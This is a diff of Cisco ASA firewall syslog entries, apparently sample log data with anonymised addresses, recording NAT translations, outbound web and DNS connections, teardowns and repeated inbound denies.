-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257
+Oct 10 2018 
12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 
2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 
(172.31.98.44/1453) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) 
